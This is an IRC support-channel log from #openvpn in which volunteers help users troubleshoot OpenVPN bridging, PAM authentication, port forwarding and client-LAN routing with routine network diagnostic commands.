06:21 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.]
06:32 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn
06:55 -!- cosmicgate [~root@94.249.242.85] has joined #openvpn
06:55 < cosmicgate> !paste
06:55 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use
06:55 < cosmicgate> !logs
06:55 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile
06:57 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Read error: Connection reset by peer]
06:59 < AsadH> ssssh cosmicgate
07:02 -!- master_of_master [~master_of@p57B553B8.dip.t-dialin.net] has quit [Ping timeout: 240 seconds]
07:03 -!- hid3 [~arnoldas@78.157.71.116] has left #openvpn []
07:04 -!- master_of_master [~master_of@p57B53D36.dip.t-dialin.net] has joined #openvpn
07:19 -!- pa__ [~pa@host55-12-dynamic.61-82-r.retail.telecomitalia.it] has joined #openvpn
07:20 -!- mcp [~mcp@wolk-project.de] has quit [Excess Flood]
07:21 -!- mcp [~mcp@wolk-project.de] has joined #openvpn
07:33 -!- Valcorb [~Valcorb@84.198.139.192] has joined #openvpn
07:37 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Ping timeout: 240 seconds]
07:38 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn
07:41 -!- defswork [~andy@141.0.50.105] has joined #openvpn
07:43 < defswork> should I be able to run multiple client vpn connections from the same IP address ?
07:45 < cosmicgate> sure why not
07:45 < defswork> (to the same server)
07:46 < defswork> I get MULTI: bad source address from client errors in logs
07:46 <@plaisthos> Theoretically yes but if you are asking such a question it does probably not do what you want
07:47 <@plaisthos> !nobind
07:47 <@vpnHelper> "nobind" is Do not bind to local address and port. The IP stack will allocate a dynamic port for returning packets. Since the value of the dynamic port could not be known in advance by a peer, this option is only suitable for peers which will be initiating connections by using the --remote option.
07:47 < defswork> we have a remote site with openvpn tunnel router to router
07:47 < defswork> and when laptop users go there and forget they start a road warrior openvpn connection over the same internet connection
07:48 < cosmicgate> ./usr/bin/openvpn -daemon server.conf
07:49 < defswork> hmm ok - nobind on all the clients
07:50 < defswork> that will still be an issue if multiple clients choose the same port though ?
07:51 <@plaisthos> you need to use tls-server for that at least
07:51 < defswork> I do
07:52 < defswork> it's not something I specifically want to support - it's just the fallout it causes when someone does it
07:52 < defswork> I could block internal client vpn connections outbound
07:56 -!- mcp [~mcp@wolk-project.de] has quit [Excess Flood]
07:56 -!- c3vin [~c3vin@70.62.198.163] has joined #openvpn
07:57 -!- mcp [~mcp@wolk-project.de] has joined #openvpn
08:02 -!- mcp [~mcp@wolk-project.de] has quit [Ping timeout: 276 seconds]
08:08 -!- emcepe [~mcp@wolk-project.de] has joined #openvpn
08:13 -!- cpm [~Chip@pdpc/supporter/active/cpm] has joined #openvpn
08:17 <@dazo> defswork: most of the days, I'm running several OpenVPN clients simultaneously ...
but they're all to different networks, though
08:18 -!- erry is now known as yrre
08:19 -!- yrre is now known as erry
08:23 -!- niervol [~krystian@193.106.244.150] has joined #openvpn
08:33 -!- nickanderson_afk is now known as nickanderson
08:58 < fys> http://www.newegg.com/Product/Product.aspx?Item=N82E16833122179
08:58 < fys> Opinions on this switch for a small office?
08:58 <@vpnHelper> Title: Newegg.com - NETGEAR 48 Port Stackable Gigabit Smart Switch w 2 Combo 4 SFP ports - Lifetime Warranty GS748TS (at www.newegg.com)
08:59 -!- Dashers [dash@home.aligrant.com] has joined #openvpn
09:00 < Dashers> I cannot get traffic to return to my client over an ethernet bridge, can anybody help?
09:00 < Dashers> OVPN has eth0 and tap0, both without IP addresses which are bridged with br0.
09:01 < Dashers> My client connects and gets an IP address from a DHCP server behind eth0.
09:01 < Dashers> I can ping between the server and the client
09:01 < Dashers> When I try to ping from the client to a host behind the server, the remote machine receives the request and replies, but the reply doesn't make it back to the client.
09:02 < Dashers> There are no firewalls running
09:03 < Dashers> NB. This is tap not tun, so no L3 routing involved.
09:05 -!- emcepe is now known as mcp
09:05 < _quadDamage> !1918
09:05 <@vpnHelper> "1918" is (#1) RFC1918 makes three unique netblocks available for private use: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 or (#2) see also: http://en.wikipedia.org/wiki/Private_network or http://www.faqs.org/rfcs/rfc1918.html or (#3) Too lazy to find your own subnet?
Try this one: http://scarydevilmonastery.net/subnet.cgi
09:06 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Quit: Leaving]
09:11 -!- cpm [~Chip@pdpc/supporter/active/cpm] has quit [Quit: cpm]
09:11 -!- djc [~djc@gentoo/developer/djc] has joined #openvpn
09:11 -!- djc [~djc@gentoo/developer/djc] has left #openvpn []
09:16 -!- EugeneKay [eugene@madeitwor.se] has quit [Remote host closed the connection]
09:16 -!- [Xaronic] is now known as frankensquirrel
09:17 -!- EugeneKay [eugene@madeitwor.se] has joined #openvpn
09:18 -!- amir [~amir@unaffiliated/amir] has quit [Remote host closed the connection]
09:19 -!- frankensquirrel is now known as [Xaronic]
09:20 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Ping timeout: 252 seconds]
09:22 < Dashers> Anybody?
09:24 < EugeneKay> Nobody.
09:29 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
09:33 -!- gladiatr [~sdspence@24.124.30.22] has joined #openvpn
09:33 -!- gladiatr [~sdspence@24.124.30.22] has quit [Changing host]
09:33 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn
09:38 < _quadDamage> Dashers: I've never had any problems with my smaller managed Netgears. I know of one very large organization in particular that uses them (the extra reliability deemed not worth the price...keep spares).
09:39 < _quadDamage> sorry fys ^^^
09:40 < _quadDamage> also, "extra reliability" as compared to Cisco, Juniper, et al. I'm apparently braindead this morning
09:40 <@ecrist> s/this morning//
09:41 < _quadDamage> My biggest complaint with the smaller units (not sure if 48-ports are the same) is the lack of 64-bit SNMP counters.
09:42 < _quadDamage> and I did have an external power supply flake out...after 6 years.
09:42 -!- b1rkh0ff [~b1rkh0ff@178.77.4.218] has joined #openvpn
09:47 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.]
09:49 -!- niervol [~krystian@193.106.244.150] has joined #openvpn
09:59 < Dashers> Well I've figured out my problem. My Openvpn bridge is not updating the ethernet frames with the correct mac address.
09:59 < Dashers> But I doubt anybody here can help me with that...
09:59 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Quit: off to do some thoughtcrime]
10:00 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 264 seconds]
10:06 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
10:07 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
10:07 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
10:10 < _quadDamage> Dashers: OpenVPN should not be reframing traffic. Does the OpenVPN server see replies from the remote server?
10:10 < Dashers> Nope
10:10 -!- cosmicgate [~root@94.249.242.85] has quit []
10:14 -!- raidz_away is now known as raidz
10:16 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 272 seconds]
10:20 -!- Orbi [~opera@anon-149-235.vpn.ipredator.se] has joined #openvpn
10:29 < _quadDamage> Dashers: does the destination mac of the reply match the source mac of the request? is this the mac of the client tap?
10:29 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer]
10:47 < Dashers> Figured it, ESXi was blocking it
10:49 -!- LEDfan [~quassel@94-226-126-193.access.telenet.be] has quit [Remote host closed the connection]
10:49 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]]
10:51 -!- Dashers [dash@home.aligrant.com] has quit [Quit: leaving]
10:52 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
11:03 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has quit [Remote host closed the connection]
11:05 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn
11:11 < EugeneKay> Promiscuous mode?
11:14 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
11:14 < hg_5> hello
11:19 -!- hazardous [~dbn@void.kassad.in] has quit [Changing host]
11:19 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn
11:19 -!- mode/#openvpn [+v hazardous] by ChanServ
11:22 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
11:22 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Remote host closed the connection]
11:22 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
11:23 < hg_5> hello, what does that mean ;p "Next, ask yourself if you would like to allow network traffic between client2's subnet (192.168.4.0/24) and other clients of the OpenVPN server" ?
11:26 <@krzee> hg_5, are you really asking us to explain a walkthrough?
11:26 <@krzee> !walkthrough
11:26 <@vpnHelper> "walkthrough" is if you are using some walkthrough and now you are here cause you have problems and dont understand your setup, type !howto and !man and try to actually learn what you're doing. most those docs about openvpn from google SUCK.
11:26 <@krzee> :D
11:27 < hg_5> can you describe the difference between routing a client subnet and allowing network traffic between client2 and other clients?
11:33 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has joined #openvpn
11:33 -!- SpookZa [~SpookZA@197.87.128.172] has left #openvpn []
11:36 <@krzee> hg_5,
11:36 <@krzee> !route
11:36 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide
11:36 <@krzee> from client to client by vpn ip has a shortcut
11:36 <@krzee> !c2c
11:36 <@vpnHelper> "c2c" is "client-to-client" is with this option packets from 1 client to another are routed inside the server process. without it packets leave the server process, hit the kernel (firewall, routing table) and if allowed by firewall and routed back to server process, they go to the client. you use this option when you do not want to use selective firewall rules on what clients can access things behind
11:36 <@vpnHelper> other clients
11:39 < hg_5> ok simple: if i will add just this http://pastebin.com/6CeysgLy , will i be able to ping client from my router?
11:41 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 256 seconds]
11:58 -!- WDKevin [~WDKevin@173-163-136-177-centralpennsylvania.hfc.comcastbusiness.net] has joined #openvpn
11:59 < WDKevin> I'm having trouble getting my home server to allow me to connect through OpenVPN. I've set the directives to use username/password authentication and I'm trying to have it authenticate against the actual users on that server. Can someone help me with the config to do this?
12:00 -!- AsadH is now known as zz_AsadH
12:17 < fys> WDKevin: you bet your ass i can
12:17 < WDKevin> well alrighty then
12:17 < fys> http://z20k.com/post/37792613220/openvpn-pam
12:17 <@vpnHelper> Title: z20k.com - OpenVPN + PAM (at z20k.com)
12:17 < WDKevin> wow
12:18 < WDKevin> you're an angel
12:18 < fys> I like to think so.
12:18 < fys> :D
12:18 < fys> I looked for that exact config for hours until I found it, so I re-posted it on my domain for if this ever happened.
12:18 < WDKevin> that is beautiful
12:18 < fys> :D
12:18 < WDKevin> im ssh'd into my home vpn server, i should be able to do this all remotely, right?
12:19 < fys> Yeah, for sure.
12:20 < WDKevin> excellent
12:20 < WDKevin> now, i do still need a server certificate, right?
12:20 < fys> Yeah.
12:20 < WDKevin> ok
12:20 < WDKevin> i have one i generated initially, i suspect i will need to regenerate one though after i change some config options
12:20 < fys> but that's -all- you need.
12:20 < WDKevin> good
12:20 < WDKevin> server.conf, right?
12:20 < WDKevin> or is it ca.crt?
12:21 < fys> ca.crt
12:21 < WDKevin> ok
12:21 < fys> I deploy our employees w/ a Viscosity (osx openvpn client) with that file included.
12:21 < WDKevin> right
12:21 < WDKevin> thats what im going to do
12:21 < fys> then simply add them to the openvpn server.
12:21 < fys> easy peasy
12:21 < WDKevin> just keep a zip hidden on my web server somewhere that i can grab when i need it
12:22 < WDKevin> your post here, am i posting all that into server.conf?
12:22 < WDKevin> err wait
12:22 < WDKevin> nevermind
12:22 < WDKevin> i see some commands too
12:22 < fys> everything but the iptables rules
12:22 < fys> yeah
12:22 < WDKevin> whats the port, proto and dev lines?
12:22 < WDKevin> just common fyi's?
12:23 < fys> it just sends your /dev/tun0 traffic out eth0
12:23 < fys> which you need it to do
12:23 < WDKevin> but where do i put those 3 lines?
12:23 < fys> oh
12:23 < fys> you issue them as commands
12:23 < WDKevin> ok
12:23 < fys> What distro are you on?
12:23 < WDKevin> ubuntu
12:23 < fys> Ah, I'm not sure how the iptables rules are saved on Ubuntu.
12:23 < WDKevin> i have tun0 already setup
12:23 < fys> I think You have to do it manually.
12:24 < WDKevin> im able to connect to my vpn server already, i just cant auth
12:24 < fys> Your path is probably different for the pam auth .so
12:24 < fys> that config is from CentOS
12:24 < WDKevin> i found it earlier
12:24 < WDKevin> its actually the same
12:24 < fys> Seriously?
12:24 < fys> weird
12:24 < WDKevin> it was different from the openvpn docs
12:24 < WDKevin> but it matches what you have
12:24 < fys> Oh wait.
12:25 < fys> that makes perfect sense actually
12:25 < fys> because my openvpn box at home is debian
12:25 < fys> forgot about that..
12:25 < WDKevin> haha
12:25 < WDKevin> that explains it
12:25 < fys> :D
12:25 < WDKevin> so
12:25 < WDKevin> yea
12:25 < WDKevin> what the hell am i doing with this post? lol
12:25 < fys> well
12:25 < fys> do you have your ca.crt and server keys?
12:26 < WDKevin> yes
12:26 < WDKevin> i have them from when i initially generated them
12:26 < WDKevin> as in i have them on the server
12:26 < fys> if you don't mind keeping the subnets i defined
12:26 < fys> you should be able to copy and paste the config into server.conf
12:26 < fys> replace the filenames with yours
12:26 < WDKevin> from the port line down to the username-as-common-name line?
12:26 < fys> no, the keys and crts
12:26 < fys> cert /etc/openvpn/easy-rsa/keys/greed.crt
12:26 < WDKevin> yea
12:26 < fys> like yours would be servername.crt
12:26 < WDKevin> but i mean the copy/paste part
12:27 < fys> ohhh
12:27 < fys> yes
12:27 < WDKevin> copy everything from port down to username-as-common into my server.conf then make the changes to the key locations and the ip subnets?
12:27 < fys> username-as-common-name
12:27 < fys> would be the last name of the server.conf
12:27 < WDKevin> line*
12:27 < WDKevin> you mean, right?
12:28 < WDKevin> also, im not actually looking to funnel my traffic
12:28 < WDKevin> i just want to get onto my lan
12:28 < WDKevin> so can i drop the push route line?
12:28 < fys> no
12:29 < fys> that handles routing the vpn subnet
12:29 < fys> otherwise you won't be able to address your LAN
12:29 < WDKevin> oh ok
12:29 < WDKevin> i just need to change the 10. ip to my actual vpn servers ip?
12:30 < fys> no
12:30 < fys> that's the vpn subnet
12:30 < fys> you'd leave it as-is
12:30 < WDKevin> oh ok
12:30 < WDKevin> same with the server line too?
12:30 < fys> yup
12:30 < fys> you could literally make that any private ip subnet you want
12:31 < fys> as long as it doesnt overlap with your existing lans
12:31 < hg_5> hey, this configuration will be correct http://puu.sh/1Yq4c ? i added route .... and push .... to 192.168.7.0
12:31 < WDKevin> fys, my existing lans is all on 192.168.1
12:31 < fys> ah then you're good
12:32 < WDKevin> im good keeping them at 10.0whatever you have?
12:33 < fys> yeah
12:33 < WDKevin> and then issue the iptables into the terminal?
12:33 < WDKevin> line by line?
12:33 < fys> hg_5: why are you pushing 2 routes that have nothing to do with the server subnet
12:33 < fys> WDKevin: yeah, but be careful copying and pasting sometimes dashes get converted weird.
12:33 < WDKevin> i noticed the " came over as .
12:33 < WDKevin> so i will make sure on those lines too
12:34 < fys> yeah
12:34 < WDKevin> now question
12:34 < WDKevin> should i be able to at least connect without running those iptables commands?
12:34 < WDKevin> or are those crucial to authenticating?
12:34 < fys> yeah
12:34 < WDKevin> ok
12:34 < WDKevin> because im still getting the same error
12:34 < fys> check what the server log says
12:34 < WDKevin> ah, good point
12:34 < WDKevin> lol
12:35 < fys> :D
12:35 < hg_5> fys i need to see clients connected to vpn client router
12:35 < WDKevin> where the hell is the openvpn log?
12:35 < fys> you define it
12:35 < WDKevin> found it
12:35 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat]
12:35 < WDKevin> i was looking in /var/log
12:36 < fys> ah
12:36 < fys> yeah
12:36 < fys> i should probably do that in my config, move it to /var/log
12:36 < WDKevin> do i want openvpn.log or openvpn-status.log?
12:36 < WDKevin> neither one really shows me anything worth anything
12:37 < fys> have you restarted the vpn daemon since changing the file?
12:37 < WDKevin> yes
12:37 < fys> what error are you getting?
12:38 < WDKevin> ConnectionRefusedError: 10061: No connection could be made because the target machine actively refused it..
12:38 < WDKevin> i wonder if thats a router port forwarding issue
12:38 < fys> sounds like it
12:38 < WDKevin> though i have port forwarding already setup for this
12:38 < fys> udp port 1194?
12:38 < WDKevin> yup
12:38 < fys> and it's allowed on that box?
12:39 < fys> just as a test
12:39 < WDKevin> should be
12:39 < fys> disable iptables
12:39 < fys> then try
12:39 < WDKevin> im logging into my router now
12:39 < fys> werd
12:39 < WDKevin> i have port 1194, both, forwarding to that box on port 1194
12:39 < fys> now on that box
12:39 < fys> disable iptables for a second
12:39 < WDKevin> when i do an nmap localhost, i do not see 1194
12:41 < WDKevin> shouldnt i see port 1194 when i nmap that box?
12:41 < fys> do this
12:41 < fys> netstat netstat -ltnup | grep 1194
12:41 < fys> er
12:41 < fys> netstat -ltnup | grep 1194
12:42 < WDKevin> udp 0 0 0.0.0.0:1194 0.0.0.0:* 4051/openvpn
12:42 < WDKevin> got that
12:42 < WDKevin> those 0's look like they could be problematic
12:42 < fys> nope
12:42 < WDKevin> all good?
12:42 < fys> that just means it's listening on all interfaces
12:42 < fys> yeah
12:42 < WDKevin> strange
12:43 < WDKevin> i dont have to forward any additional ports on the router?
12:43 < fys> no
12:43 < fys> http://serverfault.com/questions/129086/how-to-start-stop-iptables-on-ubuntu
12:43 <@vpnHelper> Title: How to start/stop iptables on Ubuntu? - Server Fault (at serverfault.com)
12:43 < fys> i wish iptables was as easy on ubuntu as it is on CentOS
12:43 < fys> bleh
12:43 < WDKevin> heh
12:44 < WDKevin> i dont have any iptables rules
12:44 < fys> iptables -nL shows nothing?
12:44 < WDKevin> shows accept on everything
12:44 < fys> that's weird because if your router is forwarding it to that box
12:45 < WDKevin> input accept, forward accept and output accept
12:45 < fys> and openvpn is listening on that box
12:45 < WDKevin> should i be forwarding to the eth0 ip or the tun0 ip?
12:45 < fys> eth0
12:45 < fys> actually
12:45 < WDKevin> that might be the problem
12:45 < fys> if it's being port forwarded
12:45 < WDKevin> im forwarding to the br0 port
12:45 < fys> it'd be your public ip
12:45 < fys> so do this
12:46 < fys> curl -s icanhazip.com
12:46 < fys> from that box
12:46 < fys> and -that- is the ip your client should be connecting to
12:46 < WDKevin> dont have curl installed
12:46 < fys> gah
12:46 < fys> brb meeting
12:46 < WDKevin> wait
12:46 < WDKevin> its hitting my public ip
12:46 < WDKevin> im ssh'd into the same box
12:49 < hg_5> fys what should i write then ?
12:49 -!- zz_AsadH is now known as AsadH
12:57 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
13:08 -!- [1]c3vin [~c3vin@70.62.198.163] has joined #openvpn
13:08 < fys> sorry guys
13:08 < fys> got called into a meeting with the owner
13:09 -!- c3vin [~c3vin@70.62.198.163] has quit [Ping timeout: 240 seconds]
13:09 -!- [1]c3vin is now known as c3vin
13:14 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 245 seconds]
13:14 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds]
13:15 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 245 seconds]
13:21 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 264 seconds]
13:22 < hg_5> fys are you there?
13:22 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn
13:23 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn
13:23 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
13:23 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn
13:42 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
13:45 < WDKevin> fys, no problem, i just got back from lunch myself
13:48 <+pekster> WDKevin: You're trying to do what, expose a LAN behind the openvpn server?
13:48 < WDKevin> give me a holler when you get back fys
13:48 < WDKevin> pekster, im trying to just get connected and authenticated against the current users
13:48 < WDKevin> fys got me setup with his config that does the same thing, but i cant seem to get connected
13:48 < WDKevin> we went through and verified the ports are open, and forwarded on my router
13:48 < WDKevin> but then he got called aside
13:49 < WDKevin> i dont know if my interfaces file is misconfigured or what, but my openvpn.log has nothing in it about connection attempts
13:50 <+pekster> Server is running on RFC1918 IP space? If so, start there and work back to the router, verifying firewalls/NAT setup is valid
13:50 <+pekster> 'iptables-save' will give you a complete view of the server's firewall (assuming Linux as the OS)
13:51 < WDKevin> the vpn server is on ubuntu. iptables -nL shows accept for incoming, forwarding and outgoing
13:51 <+pekster> Use iptables-save
13:51 < WDKevin> i have dd-wrt on the router, which is forwarding port 1194 to the server
13:51 <+pekster> Other tables can impact things too (mangle, nat, etc)
13:52 < WDKevin> do you want me to pastie the output of iptables-save?
13:52 <+pekster> iptables -L is a bastard child that no one who actually works with netfilter seriously likes very much
13:52 <+pekster> Please. Let's start at the end and work out
13:52 < WDKevin> thats fine
13:52 < WDKevin> just tell me what to do
13:52 < WDKevin> and so you know, im at work, ssh'd into my vpn server
13:52 <+pekster> No worries
13:53 < WDKevin> so start with iptables-save?
13:54 <+pekster> Yup. No point in checking the router's forwarding until we know your server is configured to accept the traffic
13:54 < WDKevin> one quick question, also. in my router, should i be forwarding the port to the ip of eth0 or br0 on my vpn server?
13:54 <+pekster> The one holding your LAN IP. If that's confusing, please also pastebin the output of 'ip addr show'
13:54 < WDKevin> output of iptables-save: http://pastie.org/private/n6yrsb4hrzqyw8cgrnnow
13:54 <@dazo> WDKevin: if bridging eth0 with something else as br0 .... eth0 should not have an IP at all ... only br0 should have the IP
13:55 <+pekster> Okay, completely open ruleset with no mangle or nat tables loaded, so that's fine
13:55 < WDKevin> output of ip addr show: http://pastie.org/private/d07nevghool58pusqvvjfa
13:55 < WDKevin> im thinking the br0 is half the problem
13:55 <+pekster> Probably
13:55 <+pekster> brctl show dev br0
13:55 < WDKevin> run that?
13:55 <@dazo> eth0 and br0 both have the IP 192.168.1.101/24 ... that will fail
13:55 < WDKevin> i had openvpn working before and i dont remember ever having a br0
13:56 < WDKevin> but when i followed the guide on ubuntu.com this time it had me set one up
13:56 <@dazo> WDKevin: why do you bridge?
13:56 <+pekster> You probably don't need a bridge at all
13:56 < WDKevin> i dont think i do
13:56 <@dazo> https://community.openvpn.net/openvpn/wiki/BridgingAndRouting
13:56 <@vpnHelper> Title: BridgingAndRouting – OpenVPN Community (at community.openvpn.net)
13:56 < WDKevin> i did remove it from the interfaces file, but after running service networking restart its still there
13:57 <+pekster> I'd tell you to just remove the bridge, but if you mess it up and lose the LAN IP you'll lose remote access. That's likely your issue, or at least one of them
13:57 <+pekster> If you know your network config is good you can schedule a cron to reboot in 10 minutes or so if you do lose control
13:57 < WDKevin> ill give it a try. if it messes up ill finish when i get home
13:58 < WDKevin> how do i remove the bridge?
13:58 < WDKevin> i have assigned eth0 with a static ip in interfaces, but its not seeming to take effect
13:58 < WDKevin> i must be missing something
13:58 <+pekster> Because the bridge has the same IP. In Linux, bridge members never hold the IP, the bridge interface does
13:59 < WDKevin> but i removed the bridge from interfaces
13:59 <@dazo> WDKevin: if you have a openvpn config which connects well (meaning the --remote, --key/--cert/--ca etc options working kind of) ... then look at the "Using Routing" section in the URL above
13:59 <+pekster> 'brctl show' will show you your bridge status now
13:59 <@dazo> and if both br0 and eth0 share an IP address ... that won't route well
13:59 < WDKevin> it shows it on eth0
13:59 <+pekster> If eth0 is in br0, remove it first via 'brctl delif br0 eth0' and then you can remove the bridge with 'brctl delbr br0'
13:59 < WDKevin> ok
14:00 <+pekster> Again, if br0 is in use now, that may cause you connectivity issues
14:00 < WDKevin> ill give it a shot
14:00 < hg_5> hi pekster, can you check if this config is proper on my openvpn server http://pastebin.com/MpQW0nmk
14:00 < WDKevin> if it messes up ill do it when i get home
14:00 < WDKevin> ill email myself the commands you just gave me
14:01 < WDKevin> yep, that broke it
14:03 <+pekster> hg_5: It's technically a "valid" configuration, although no clue why you're explicitly declaring tun21 (openvpn usually creates a device dynamically when you bring it up.) Further, 'daemon' is usually specified by init scripts, not config files, but it's not "wrong" to do that if you want
14:03 <@dazo> on some router firmwares, you do need --daemon explicitly
14:04 <+pekster> Well, I'm guessing by the "automatically generated configuration" that some Web GUI frontend thing made that file
14:04 < hg_5> and my ccd file: client10
14:04 < hg_5> iroute 192.168.7.0 255.255.255.0
14:04 <+pekster> No idea how it interacts with the init system to get tun21, but I'll happily ignore that unless errors show it's a problem
14:05 < hg_5> pekster where can i find automatical configuration?
14:05 <@dazo> there's no such thing :)
14:05 <+pekster> Sure, so client10 "owns" that network. That matches with your server config options
14:05 <+pekster> It's a valid configuration, assuming it starts properly and works with the OS's init scripts
14:07 < hg_5> yes client10 owns this network
14:07 <+pekster> Although, no real point in pushing the route to 192.168.7/24 since you redirect-gateway anyway, but you might as well leave that in if you decide to undo that (and it'll likely annoy your autoconfig voodoo if you tinker with it.) I can't help with the frontend, just the config and any errors you get. The rest is an exercise for the reader ;)
14:08 <+pekster> (doing both won't hurt anything)
14:08 < hg_5> pekster so... it will be enough if i will just add client10 ccd file? (instead of making push route to 192.168.7.x) ?
14:08 <+pekster> Yes. But you need that push for the route if you ever *remove* the redirect-gateway push
14:08 <+pekster> (otherwise other clients can't reach that network)
14:09 <+pekster> For a detailed flowchart on how client-lan connectivity works, see:
14:09 <+pekster> !clientlan
14:09 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route
14:09 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
14:09 <+pekster> That shows you each step that is required. Assuming your firewalls and routing is enabled properly on that unit, you should have all the config steps met already with that setup
14:09 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
14:10 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 244 seconds]
14:11 < hg_5> hm pekster i have to do that http://puu.sh/1YsJE in server and client ?
14:11 <+pekster> That's the push for 192.168.7.0/24, so yes you already have it
14:12 -!- pa__ [~pa@host55-12-dynamic.61-82-r.retail.telecomitalia.it] has quit [Quit: Sto andando via]
14:12 <+pekster> The 'route' command tells the OS to let the openvpn server "be responsible" for that route (so you need that always when a client LAN has that range you wish to connect/route to)
14:12 -!- pa [~pa@unaffiliated/pa] has joined #openvpn
14:12 <+pekster> The 'push' for that route lets *other* VPN clients connect to it
14:15 <+pekster> hg_5: Are you having problems with that config? Does the server start cleanly without errors? (remember, it'll send logs to the system logger in your setup)
14:15 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer]
14:16 < hg_5> pekster wait i have to reset router and i will check, because before i have this route push but didnt have ccd in jffs so it disappeared after reboot
14:17 <+pekster> There should be a way to start or restart the VPN through an init system, but since that doesn't look like openwrt I can't really help (and I actually hate openwrt's stock openvpn support anyway too, but I digress)
14:17 <+pekster> Maybe look in /etc/init.d or see your platform's documentation on the preferred way to restart it
14:18 <+pekster> (or yea, reboot ;)
14:21 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
14:26 -!- niervol [~krystian@193.106.244.150] has quit [Remote host closed the connection]
14:35 -!- dazo is now known as dazo_afk
14:42 -!- Valcorb [~Valcorb@84.198.139.192] has quit []
14:42 < hg_5> pekster still it doesnt work with this config
14:42 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
14:44 <+pekster> "doesn't work" isn't very descriptive. Logs at 'verb 4' and a description of what's not working would be better
14:44 -!- novaflash is now known as novaflash_away
14:45 < hg_5> pekster ok wait
14:46 -!- novaflash_away is now known as novaflash
14:48 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
14:48 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
14:50 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit]
14:50 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
14:51 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit]
14:51 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 244 seconds]
14:51 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
14:51 -!- Orbi [~opera@anon-149-235.vpn.ipredator.se] has quit [Ping timeout: 272 seconds]
14:54 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit]
14:55 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
